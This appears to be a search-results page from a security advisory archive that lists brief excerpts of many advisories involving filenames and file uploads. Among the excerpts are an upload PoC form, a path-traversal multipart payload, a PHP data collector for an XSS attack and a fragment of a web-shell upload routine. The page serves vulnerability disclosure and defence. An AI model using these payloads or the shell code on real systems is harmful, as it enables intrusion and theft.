
filenames

WordPress 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution

if (! @ is_uploaded_file( $file['tmp_name'] ) )
        return $upload_error_handler( $file, __( 'Specified file failed upload test.' ));

// A correct MIME type will pass this test. Override $mimes or use the upload_mimes filter.
if ( $test_type ) {
        $wp_filetype = wp_check_filetype( $file['name'], $mimes );

        extract( $wp_filetype );

        if ( ( !$type || !$ext ) && !current_user_can( 'unfiltered_upload' ) )
                return $upload_error_handler( $file, 

[waraxe-2012-SA#084] - Multiple Vulnerabilities in OpenCart 1.5.2.1

Test: for testing, let's use the HTML form below:
-----------------[ PoC code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/opencart1521/index.php?route=product/product/upload"
method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload test">
</form>
</center></body></html>
-----------------[ PoC code end ]-----------------------------------


Foxit Reader Multiple Vulnerabilities (CORE-2009-0218)

defined by the creator of the PDF file without asking the user for
confirmation. A proof of concept PDF file is included [4].

The second one is a stack-based buffer overflow (CVE-2009-0837). If an
'Open/Execute a file' action is defined in the PDF file with an overly
long filename argument, when the trigger condition is satisfied it will
cause a stack-based buffer overflow, because the application tries to
copy the filename argument to a fixed-size buffer in the stack without
properly checking that the buffer is large enough to hold the filename
string. Proof of concept PDF file also included [5].


CORE-2008-0204: Timbuktu Pro Remote Path Traversal and Log Injection

Timbuktu Pro [1] is a desktop-to-desktop remote control software for the
Windows and Macintosh operating systems. The following vulnerabilities
have been identified in Timbuktu Pro:

 1) File transfer directory traversal (CVE-2008-1117): The '\' and '/'
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.

 2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)

CORE-2008-0123: Leopard Server Remote Path Traversal

Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21

- ------------YN7xkbcuNgNx21psG30p21

Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"

Content-Type: application/octet-stream




Collection of Vulnerabilities in Fully Patched Vim 7.1

2. Overview

``Vim is an almost compatible version of the UNIX editor Vi.  Many new features
have been added: multi-level undo, syntax highlighting, command line history,
on-line help, spell checking, filename completion, block operations, etc.''
        -- VIM 7.1 README.txt

Parts of Vim are written in the Vim script language.  A feature of this
language widely used in the Vim code is the ``execute'' command, an equivalent
of ``eval'' in some other languages.  Throughout Vim, arguments passed to

Vtiger CRM 5.0.4 Multiple Vulnerabilities

When this feature is requested and an attachment is specified, the
"saveForwardAttachments" validation routine is called.

This routine performs some security checks on uploaded files: it does
blacklist extension checking, and if a bad extension is detected, the
.txt extension is appended to the file name.

The following is the specific section:

--8<--8<--8<--8<--8<--8<--8<--

Vtiger CRM 5.0.4 Multiple Vulnerabilities


CA DSM gui_cm_ctrls ActiveX Control Vulnerability

Unicenter Desktop Management Bundle r11.1 (GA, a, C1),
Unicenter Asset Management r11.1 (GA, a, C1),
Unicenter Software Delivery r11.1 (GA, a, C1),
Unicenter Remote Control r11.1 (GA, a, C1),
CA Desktop and Server Management r11.1 (GA, a, C1)
File Name:
gui_cm_ctrls.ocx
File Version:
11.1.8124.2517

Product:

CA ARCserve Backup for Laptops and Desktops Server LGServer Service Vulnerability

4. If the file date is earlier than indicated in the below table, 
the installation is vulnerable.

CA ARCserve Backup for Laptops and Desktops
File Name   File Size (bytes)   File Date
rxRPC.dll   131,072             June 11, 2008

CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.1 
SP2
File Name   File Size (bytes)   File Date

SugarCRM 5.2.0e Remote Code Execution

administrator). When the name of the file is specified, a validation
routine is called:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

function safeAttachmentName($filename) {
        global $sugar_config;
        $badExtension = false;
        //get position of last "." in file name
        $file_ext_beg = strrpos($filename, ".");
        $file_ext = "";

PHP filesystem attack vectors

interesting code:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

streams/plain_wrapper.c-893:    if ((realpath =
expand_filepath(filename, NULL TSRMLS_CC)) == NULL) {

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The attention was then directed to the expand_filepath() function,
defined in main/fopen_wrappers.c, and finally to expand_filepath_ex(),

CA20091208-01: Security Notice for CA Service Desk

2. Right click on each of the files and select Properties.
3. Select the General tab.
4. If either file timestamp is earlier than indicated in the below
table, the installation is vulnerable.

File Name
Timestamp
Size
Size on disk

webengine.exe

Seo Panel 2.1.0 - Critical File Disclosure

(User registrations are enabled by default as well, making this attack possible in most scenarios.)
 
 
-:: Solution ::-
download.ctrl.php: (Line 55-62)
55  function isValidFile($fileName) {
56      $fileName = urldecode($fileName);
        // This tries to prevent directory traversal
57      $fileName = str_replace('../', '', $fileName);
58      if (preg_match('/\.xml$|\.html$|\.txt$/i', $fileName)) {
59          return $fileName;

Re: Seo Panel 2.1.0 - Critical File Disclosure

This is really a non-fix, as some legitimate files might have the double-period as part of their name, and it might still be circumvented with exactly the same string you provided here minus one slash.

The real solution would be to get the absolute path of the file provided and fail if that path isn't beneath the current directory/directory this should operate under. Something like:

$fnCheck = realpath($fileName);
if ($fnCheck === FALSE || strncasecmp(getcwd(), $fnCheck, strlen(getcwd())) !== 0) return false;

(replacing getcwd() with whatever dir this should work with if not the current one)

-Zach

CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability

   CA Desktop Management Suite for Windows r11.1 (GA, a, C1),
   Unicenter Desktop Management Bundle r11.1 (GA, a, C1),
   Unicenter Asset Management r11.1 (GA, a, C1),
   Unicenter Software Delivery r11.1 (GA, a, C1),
   Unicenter Remote Control r11.1 (GA, a, C1)
File Name: ListCtrl.ocx
File Version: 11.1.8124.0

Product:
   CA Desktop Management Suite for Windows r11.2,
   Unicenter Desktop Management Bundle r11.2,

WinRAR v3.80 - ZIP Filename Spoofing

|                    CubilFelino Security Research Lab                   |
|                            proudly presents...                         |
+------------------------------------------------------------------------+

=======================================================
Security Advisory: WinRAR v3.80 - ZIP Filename Spoofing
=======================================================

Security Researcher Info:
=========================


[CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers

Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers



1. *Advisory Information*


[waraxe-2009-SA#075] - Remote File Disclosure in Vivvo CMS 4.1.5.1

2. POST parameters or cookies can be used as attack vector
3. Vulnerable are all Vivvo CMS versions >= 4.1.0

-----------------------------[source code start]-------------------------------
if (isset($_REQUEST["file"])) {
        $filename = str_replace('..', '', $_REQUEST["file"]);
        $filename = str_replace('logs/', '', $filename);
        $file = VIVVO_FS_ROOT . 'files/' . $filename;
        if (file_exists($file) && !is_link($file) && !is_dir($file)){
                $file_split =  explode('.', $file);
                $ext = end ($file_split);           

Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)

Original URL:
http://securityreason.com/achievement_securityalert/98


--- 0.Description ---
fnmatch -- match filename or pathname using shell glob rules

SYNOPSIS
     #include <fnmatch.h>

     int

پيش گزيده Website Design Chat Software Remote Cross-Site Scripting

First we need a little PHP file in order to get and save the needed information, plus a .txt file to save it in; the file must be chmod 777 for this to work.
[code]
<?php
if ( $_GET['text'] ) {
$text = $_GET['text'];
$filename = "Aria-Security.txt";
$fp = fopen( $filename, "w" ) or die("Couldn't open $filename");
fwrite( $fp, "$text" );
fclose( $fp );
}
//--------------

CA ARCserve Backup Multiple Vulnerabilities

   3. Select the General tab.
   4. If the file timestamp is earlier than indicated in the table 
      below, the installation is vulnerable.

Product version: CA ARCserve Backup r11.1 Windows
File Name: asdbapi.dll
File Size: 856064 bytes
Timestamp: 09/05/2008 10:35:19

Product version: CA ARCserve Backup r11.5 Windows*
File Name: asdbapi.dll

CVE-2010-0624: Heap-based buffer overflow in GNU Tar and GNU Cpio

The problem can be exploited when using an untrusted/compromised rmt
server. The impact is fairly low since rmt is rarely used today and
the rmt server is in most cases considered trustworthy.

However, this vulnerability can also be triggered when trying to
extract a tar file with a colon in the filename. In this case, tar
interprets the part before the colon as a hostname (or user@hostname)
and opens an rsh connection to this host. This may also be exploited if
the user uses the aunpack script from atool [1] to extract a tar
file. Many users of GNU Tar or atool don't know that rmt exists and
that tar treats filenames containing a colon differently. So a user

FW: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

I actually DID try to access the .sdb in Ubuntu but that was before I identified the file format of the db as myDB as noted.  I do not know of a 'nix based tool for access to the db.  If you just want to verify, you can open the .sdb with a text/hex editor and parse out a filename for yourself - it's pretty straightforward.  If you want to script the download of all files on a vulnerable server (for testing, of course) then you'll probably need to go ahead and set up a VM.

t

From: Rohit Patnaik [mailto:quanticle@gmail.com] 
Sent: Tuesday, December 15, 2009 6:29 PM
To: Thor (Hammer of God)
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

[security bulletin] HPSBMA02661 SSRT100408 rev.3 - HP SNMP Agents Running on Linux and HP Insight Management Agents Running on Windows, Remote Cross Site Scripting (XSS), URL Redirection, Information Disclosure

Patches

Red Hat Enterprise Linux - HP SNMP Agents v8.7.0

Product
 File Name

HP SNMP Agents for Red Hat Enterprise Linux 5 (AMD64/EM64T)
 hp-snmp-agents-8.7.0.23-17.rhel5.x86_64.rpm

HP SNMP Agents for Red Hat Enterprise Linux 6 (AMD64/EM64T)

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

function upload_imm () {
                global $mkportals, $DB, $mklib, $Skin, $_FILES;

..
                $file =  $_FILES['FILE_UPLOAD']['tmp_name'];
                $file_name =  $_FILES['FILE_UPLOAD']['name'];
                //$file_type =  $_FILES['FILE_UPLOAD']['type'];
                $peso =  $_FILES['FILE_UPLOAD']['size'];                
                
                if (!$file) {
                        $message = "{$mklib->lang['b_compfile']}";

Advisory 01/2009: Horde_Form_Type_image Arbitrary File Overwrite Vulnerability

   compression, browser detection, connection tracking, MIME handling,
   and more."

  During an audit of a PHP web application which is based on the Horde
  Application Framework it was discovered that form elements of the type
  Horde_Form_Type_image trust a user supplied temporary filename which
  allows to create or overwrite arbitrary files with the permissions
  of the webserver.

  By overwriting writable files within the document root like the Horde
  configuration file, or by creating new files within writable parts of

New bypass shell for linux

fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";

}
if ($doupfile) {
        echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "&#1056;™&#1056;&#1119;&#1058;‘&#1042;«&#1057;–&#1056;™&#1074;„–&#1042;¦!" : "&#1056;™&#1056;&#1119;&#1058;‘&#1042;«&#1056;&#1113;&#1042;§&#1042;°&#1056;¬!";
}


elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
        if (!empty($newdirectory)) {

TK53 Advisory #2: Multiple vulnerabilities in ClamAV

    return CL_SUCCESS;
}

This function, cli_gentempfd, uses a custom function to generate a (more or
less) unique file name which is then opened, and the file descriptor is
returned via an output parameter.

The problem with this code is that a race condition exists: if the attacker is
able to guess the generated file name, he/she is able to create such a named
file between the call of cli_gentemp() and open(), making it possible to

Apache mod_negotiation Xss and Http Response Splitting

capabilities, from one of several available documents. There are
two implementations of this.
* A type map (a file with the handler type-map) which explicitly
  lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option), where the
  server does an implicit filename pattern match and chooses from
  amongst the results.


[ Summary ]


[ISecAuditors Security Advisories] Cygwin buffer overflow due to incorrect filename length check

- Severity: 5/5
=============================================

I. VULNERABILITY
-------------------------
Cygwin buffer overflow in the filename length check

II. BACKGROUND
-------------------------
Cygwin is a Linux-like environment for Windows which consists of a DLL
binary (cygwin1.dll) that emulates the Linux API, and a set of tools


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
